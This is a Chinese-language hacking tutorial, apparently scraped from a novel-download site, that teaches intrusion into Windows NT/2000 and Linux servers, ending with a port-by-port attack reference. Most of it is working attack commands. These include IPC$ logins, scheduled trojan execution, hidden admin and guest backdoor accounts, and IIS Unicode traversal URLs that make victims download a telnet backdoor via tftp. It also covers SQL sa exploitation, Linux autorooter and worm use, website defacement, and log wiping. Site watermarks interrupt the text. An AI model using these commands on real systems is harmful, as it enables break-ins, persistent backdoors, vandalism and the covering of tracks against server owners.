  在该目录下找到net.exe”,右键net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,
  填入user用户名密码/add”,创建一个新账号,运行该快捷方式,多运行几次。此时你不会看到运行状态,但新用户已被激活。然后又修改该快捷方式,
  填入localgroupadministrators新用户/add,将新用户变成系统管理员。再运行快捷方式。。之后关掉回到登陆窗口。打入刚才添加的新用户跟密码->确定。
  突然眼前一亮出现我们熟悉的桌面。这就是一个通过输入法漏洞入侵。。
  下来讲IPC入侵:
  IPC是InternetProcessConnection的缩写,也就是远程网络连接。它是WindowsNT及Windows2000特有的一项功能,特点是在同一时间内,两个IP之间只允许
  建立一个连接。
  在刚才扫描中我们猜获了一个管理员权限,
  打开了WINDOWS自带的MS-DOS。
  用熟悉的命令NET。建立一个IPC连接。
  打入netuse\\202.XXX.XXX.XXX\ipc$"password"/user:"name"按回车.
  出现命令完成.~~~成功了.
  copysrv.exe\\202.XXX.XXX.XXX\admin$
  srv在流光的Tools目录就有了。。或是其它木马也行。
  用NETTIME查看一下对方现在的时间。
  nettime\\202.XXX.XXX.XXX
  出现了时间。这里假如为:10:20
  然后用AT添加一个作业。
  at\\202.XXX.XXX.XXX要运行的时间srv.exe
  等了一下。。。时间够了。。
  telnet202.XXX.XXX.XXX99回车。
  出现MicrosoftWindows2000[version5.00.2195]
  (C)版权所有Copyright1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  成功了~~~~~~~~
  开始动手了,先留个后门先。
  copy木马.exec:\inetpub\scripts
  多留几个。copyc:\winnt\system32\cmd.exec:\inetpub\scripts\xiao.exe
  假如刚才3389的漏洞被补的话,我们还可以通过这个来添加一个用户。我们就用guest就行了。
  首先激活guest
  netuserguest/active:yes
  再把密码设你的
  netuserguest你要的密码
  然后再将将Guest变为Administrator。
  netlocalgroupadministratorsguest/add
  OK完成了。。
  一个简的IPC$入侵就完成了。。。
  如果对方没有开3389我们还可以远程安装3389。顺便讲一下3389的远程安装。
  首先我们得先下载这两个文件:
  Wollf一个后门程序。比较少人用,这里我们用这个来作。
  HBULOT是用于开启3389服务
  第一步:用刚才所说的IPC$,
  netuse\\202.XXX.XXX.XXX\ipc$"admin123"/user:"administrator"----或是用我们刚才加上的用户也可以。
  第二步:把wollf.exe拷到对方的admin$目录
  copywollf.exe\\202.XXX.XXX.XXX\admin$
  第三步:把hbulot.exe拷对方的admin$目录
  copyhbulot.exe\\202.XXX.XXX.XXX\admin$
  第四步:查看对方时间
  nettime\\202.XXX.XXX.XXX-----------假设当前时间是200/1/1上午12:30
  第五步:新加了一项作业,让对方在12:32分运行wollf.exe
  at\\202.XXX.XXX.XXX12:32wollf.exe
  第六步:
  等。。。。。。。12:32到了。
  第七步:用wollf连接对方,7614是wollf开放的端口。
  wollf-connect202.XXX.XXX.XXX7614
  显示:
  "WollfRemoteManager"v1.6
  Codebywollf,http://www.xfocus.org
  成功~
  第八步:转换到DOS模式
  [server@C:\WINNT\system32]#dos
  显示:
  MicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-2000MicrosoftCorp.
  已进入DOS~
  第九步:转到WINNT目录
  C:\WINNT\system32>cd..
  第十步:找到HBULOT.exe
  c:\WINNT>dir*.exe
  第十一步:动行HBULOT.exe安装
  c:\WINNT>HBULOT
  hbulot
  第十二步:退出DOS
  c:\WINNT>exit
  exit
  第十三步:回到wollf,重起主机,REBOOT是wollf是自带的命令。
  Command"DOS"succeed.
  [server@C:\WINNT\system32]#reboot
  第十四步:检查一下3389端口是否开放。
  随便找个流光扫一下。如果开了证明有较。
  第十五步:用客户端登陆主机。
  这样就成功了利用IPC给远程主机安装3389。
  如果你想自己拥有这个主机的话那么你可以登陆到主机修改注册表,修改服务端的端口。
  修改服务器端的端口设置,注册表有2个地方需要修改。
  第一:
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]
  PortNumber值,默认是3389,修改成你自己要的端口,比如:1234
  第二:
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]
  PortNumber值,默认是3389,修改成你自己要的端口,比如:1234
  OK~所以完成,收工走人。。。
  但还要注意:
  走的时候记得清除一下日志:
  用小榕的CleanIISLogIIS日志处理工具
  或用del删
  期实是很简单的只是为了让菜鸟可以看得懂才写得详细点的。。。
悠U书盟 uuTxT.CoM 荃文字版阅牍


第三卷 第一十六章 字数:5824
  ?*************redcrack**********
  uid=0(root)gid=0(root)group=0(root)
  *****1.NT入侵*****
  1.工具下载(X-Scanner)扫描NTUNICODE漏洞的库我重新更新过!
  2.工具下载(SQLExec.zip)
  3.工具下载(unicode.zip)
  *NT入侵过程扫描
  用X-Scanner扫描美国网段
  当然是扫描CGI漏洞,SQL-SERVER默认帐户,NT弱口令。
  **************************************NTUNICODE漏洞***************************************
  方法
  1.找个可以ftp上传的主机,比如说你以前黑过的,或者是某个可以公用ftp的主机,把要上传到目标主机上的文件srv.exe传上去(ncx99(在工具下载的unicode.zip里面),用于开个99端口telnet上去)假如这个ftp主机的ip是:1.1.1.1username:tompasswd:pass2,假如你要黑的目标主机的ip是2.2.2.2,先把目标主机的cmd.execopy成/scripts/ccc.exe,为了方便操作和避免iis加载程序时检测特殊字符出问题。http://2.2.2.2/scripts/..%c1%1c../winnt/system32/cmd.exe?/ccopyc:\winnt\system32\cmd.exed:\inetpub\scripts\ccc.exe3,编辑一个上传执行文件,再利用ftp-s命令上传文件到scripts目录中。http://2.2.2.2/scripts/ccc.exe?/cechoopen202.99.168.15>C:\Inetpub\wwwroot\n3\up.txthttp://2.2.2.2/scripts/ccc.exe?/cechoname>>C:\Inetpub\wwwroot\n3\up.txthttp://2.2.2.2/scripts/ccc.exe?/cechofuck1234>>C:\Inetpub\wwwroot\n3\up.txthttp://2.2.2.2/scripts/ccc.exe?/cechogetdefault.htm>>>C:\Inetpub\wwwroot\n3\up.txthttp://2.2.2.2/scripts/ccc.exe?/cechoquit>>C:\Inetpub\wwwroot\n3\up.txthttp://2.2.2.2/scripts/ccc.exe?/cftp-s:up.txt4,运行srv.exe,然后就可以telnet上去。http://2.2.2.2/scripts/srv.exe之后你就可以telnet2.2.2.299后发现c:\inetpub\scripts\_提示符就在你面前了。对于NT4,还可以把它的sam._抓下来破解,WIN2000的sam.已没有用了。http://2.2.2.2/scripts/ccc.exe?/ccopyd:\winnt\repair\sam._d:\inetpub\wwwroot在用http://2.2.2.2/sam._把它抓下来,用msdos下的命令expandsam._SAM.把SAM.带回去再用l0pht解开吧。
  2.如果你嫌烦的话。在IE里打上http://xxx.xxx.xxx.xxx/.ida看他的绝对目录!(如果目录为c:\inetpub\wwroot)
  只要把他/winnt/system32/cmd.exe拷贝到一个可执行目录并改名为ccc.exe(如果目录为scripts)
  http:/xxx.xxx.xxx.xxx/scripts/ccc.exe?/cechofuckusa>c:\inetpub\wwwroot\default.html
  你就把他的主页改为fuckus了!
  3.关于用unicode上传文件的另一种方法
  开始:现在我们找到的一台漏洞主机:202.100.100.1(假设)当然下面的调用大家再熟悉不过:http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。经过比较,让服务器下载木马的方法较好:首先,下载http://www.cners.com/tools/unicode.zip解压后有如下文件:tftpd32.exe(一个FTP服务器)ncx99.exe(telnet到99端口)这两个大家都熟悉吧,其他的不用管。运行tftpd32.exe这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。回到你的浏览器,在地址栏里填入:http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp-i???.???.???.???GETncx99.exec:\\inetpub\\scripts\\sr.exe???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。再使用如下调用来执行ncx99.exe(sr.exe)http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe然后您就可以telnet202.100.100.199
  **************************************SQLSERVER漏洞入侵*************************************
  用X-Scanner扫到美国主机1433sa=null
  你就用到工具下载里面的SQLExec.zip了。
  解压后。
  c:\SQLExecxxx.xxx.xxx.xxx.xxx(美国网站)
  -----------------------出现远程命令行的界面---------------------------------------------------
  SQLCmd>_因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号!我将Guest用户激活SQLCmd>netuserguest/activesnetuserguest/active:yes
  Thecommandcompletedsuccessfully.命令成功执行!!!
  SQLCmd>netuserguest123456/*添加后门帐号密码!*/
  netuserguest123456Thecommandcompletedsucessfully.
  SQLCmd>netlocalgroupadministratorguest/add/*将GUEST加入管理员组---当然你也可以该admin密码*/netlovalgroupadministratorguest/addThecommandcompletedsuccessfully.
  这样你就可以远程登入上去了。当然你的系统是NT!!
  C:\netuse\\xxx.xxx.xxx.xxx\ipc$"123456"/user:"guest"
  Thecommandcompletedsucessfully
  登上去了
  c:\netusey:\\xxx.xxx.xxx.xxx\c$
  Thecommandcompletedsucessfully
  把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!
  **************如果你的系统是98系列
  你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest密码:123456
  然后在你的MS-DOS下
  c:\netuse\\xxx.xxx.xxx.xxx\ipc$(你不用在这里填写密码帐号了)
  Thecommandcompletedsucessfully(命令成功执行)
  下面的方法和前面一样了!!!!
  **********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************
  ***********************************对美国linux主机的入侵***********************************
  首先你的要有个Linux肉鸡。不过你用linux拨号上网的更好!!
  工具下载redbind.tgz针对bind8.28.2.18.2.28.2.2-PX
  工具下载redseclpd.tgz针对redhatlinux7.0
  工具下载redstatdx.tgz针对redhatlinux系列
  工具下载redftp.tgz针对wuftpd2.6.0
  ********************举例:redbind.tgz另外几个工具使用说明差不多*****************************
  用普通账号登陆linux
  redcrack$tarxvzfbind.tgz解压缩
  redcrack$cd/redbind进redbind目录
  redcrack$./redbind20844就开始扫描208.44B类网!并自动攻击!
  如果攻击到有漏洞的主机并且溢出成功会自动出来一个rootshell
  你可以/usr/sbin/adduserwww/*开个www账号*/
  /usr/bin/passwdwww/*给他加个密码*/
  (提高权限的方法是su.c只要你ftp上传上去gcc-osusu.c编译一下。再执行一下就变为root了!:-))
  想退出shell就按ctrl+c后继续扫描(按一次就够多按了会退出扫描的)
  如果扫描停顿也可按ctrl+c后继续扫描
  提供1i0n编写的蠕虫!!!
  使用方法是(在你拿到普通帐号的前提下)
  用su.c变为root!
  cd到/dev目录mkdirlib开个lib目录
  cp/home/www/1i0n.tgz/dev/lib/*把1i0n.tgzcopy到/dev/lib里面*/
  tarxvzf1i0n.tgz后执行./1i0n.sh
  替换掉他的主页了!!
優优書擝 uuTXT.com 全汶字扳粤渎


第三卷 第一十七章 字数:9474
  ?常见端口详解及部分攻击策略
  0通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口
  连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
  1tcpmux这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。
  Iris机器在发布时含有几个缺省的无密码的帐户,如lp,guest,uucp,nuucp,demos,tutor,diag,EZsetup,OutOfBox,
  和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
  7Echo你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。
  常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以
  它们最快的方式回应这些数据包。(参见Chargen)
  另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“ResonateGlobalDispatch”,它与DNS的这一端
  口连接以确定最近的路由。
  Harvest/squidcache将从3130端口发送UDPecho:“如果将cache的source_pingon选项打开,它将对原始主机的UDPecho
  端口回应一个HITreply。”这将会产生许多这类数据包。
  11sysstat这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信
  息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
  再说一遍:ICMP没有端口,ICMPport11通常是ICMPtype=11
  19chargen这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃
  圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企
  图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggleDoS攻击向目标地址的这
  个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
  21ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers
  利用这些服务器作为传送warez(私有程序)和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
  22sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用
  RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)
  还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程
  序的人无意中扫描到。
  UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016
  (使进制的22)。
  23Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使
  用其它技术,入侵者会找到密码。
  25smtp攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽
  的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为
  它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。
  53DNSHacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录
  53端口。
  需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常
  使用这种方法穿透防火墙。
  67和68Bootp和DHCPUDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的
  数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的
  “中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。
  这种回应使用广播是因为客户端还不知道可以发送的IP地址。
  69TFTP(UDP)许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统
  提供任何文件,如密码文件。它们也可用于向系统写入文件。
  79fingerHacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。
  98linuxconf这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有
  许多安全问题。一些版本setuidroot,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此
  外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)
  109POP2并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样
  存在。
  110POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少
  有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。
  111sunrpcportmaprpcbindSunRPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。
  常见RPC服务有:rpc.mountd,NFS,rpc.statd,rpc.csmd,rpc.ttybd,amd等。入侵者发现了允许的RPC服务将转向提供服务
  的特定端口测试漏洞。
  记住一定要记录线路中的daemon,IDS,或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
  113Identauth这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息
  (会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP,POP,IMAP,SMTP和IRC等服务。通常如果有许多客户通
  过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与
  e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。
  119NNTPnews新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/.的地址
  时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻
  组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
  135oc-servMSRPCend-pointmapperMicrosoft在这个端口运行DCERPCend-pointmapper为它的DCOM服务。这与UNIX111
  端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-pointmapper注册它们的位置。远端客户连接到机器时,它们查
  询end-pointmapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行ExchangeServer吗?
  是什么版本?
  这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
  137NetBIOSnameservicenbtstat(UDP)这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节
  139NetBIOS
  FileandPrintSharing通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”
  和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
  大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5VisualBasicScripting)开始将它们自己拷贝到
  这个端口,试图在这个端口繁殖。
  143IMAP和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)
  会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP
  后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
  这一端口还被用于IMAP2,但并不流行。
  已有一些报道发现有些0到143端口的攻击源于脚本。
  161SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得
  这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他
  们可能会试验所有可能的组合。
  SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HPJetDirectremotemanagement软件使用SNMP。
  HPOBJECTIDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cablemodem,DSL)
  查询sysName和其它信息。
  162SNMPtrap可能是由于错误配置
  177xdmcp许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。
  513rwho可能是从使用cablemodem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很
  有趣的信息。
  553CORBA
  IIOP(UDP)如果你使用cablemodem或DSLVLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remoteprocedure
  call)系统。Hacker会利用这些信息进入系统。
  600Pcserverbackdoor请查看1524端口
  一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统--AlanJ.Rosenthal.
  635mountdLinux的mountdBug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的
  mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做
  portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。
  1024许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为
  它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配
  端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat-a”,你将会看到Telnet被分
  配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”
  查看,每个Web页需要一个新端口。
  1025参见1024
  1026参见1024
  1080SOCKS
  这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的
  通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简
  单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发
  生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
  1114SQL
  系统本身很少扫描这个端口,但常常是sscan脚本的一部分。
  1243Sub-7木马(TCP)
  参见Subseven部分。
  1524ingreslock后门
  许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,
  ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试
  Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。
  2049NFS
  NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS运行于
  这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。
  3128squid
  这是SquidHTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看
  到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户
  (或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
  5632pcAnywere
  你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能
  得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。
  一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
  6776Sub-7artifact
  这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断
  时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到
  防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)
  6970RealAudio
  RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
  13223PowWow
  PowWow是TribalVoice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。
  它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中
  “继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四
  个字节。
  17027Conducent
  这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件
  显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP
  地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:机器会不断试图解析DNS名-ads.conducent.com,
  即IP地址216.33.210.40;216.33.199.77;216.33.199.80;216.33.199.81;216.33.210.41。(译者:不知NetAnts使
  用的Radiate是否也有这种现象)
  27374Sub-7木马(TCP)
  参见Subseven部分。
  30100NetSphere木马(TCP)
  通常这一端口的扫描是为了寻找中了NetSphere木马。
  31337BackOrifice“elite”
  Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E,1=L,7=T)。因此许多后门程序运
  行于这一端口。其中最有名的是BackOrifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,
  其它的木马程序越来越流行。
  31789Hack-a-tack
  这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT,RemoteAccessTrojan)。这种木马包含内置的31790
  端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文
  件传输连接)
  32770~32900RPC服务
  SunSolaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使
  低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了
  寻找可被攻击的已知的RPC服务。
  33434~33600traceroute
  如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。
  41508Inoculan
  早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此
uu書擝 uUTXt。com 全纹吇板月读




黑客技术的最新章节已更新,请登陆小说下载网
www.uutxt.com
进行下载.
用手机下载小说资源请访问
wap.uutxt.com
最快的小说更新请访问
http://www.niaoyan.com
更多精彩内容,尽在鸟眼快读.
©️2020 CSDN 皮肤主题: 大白 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值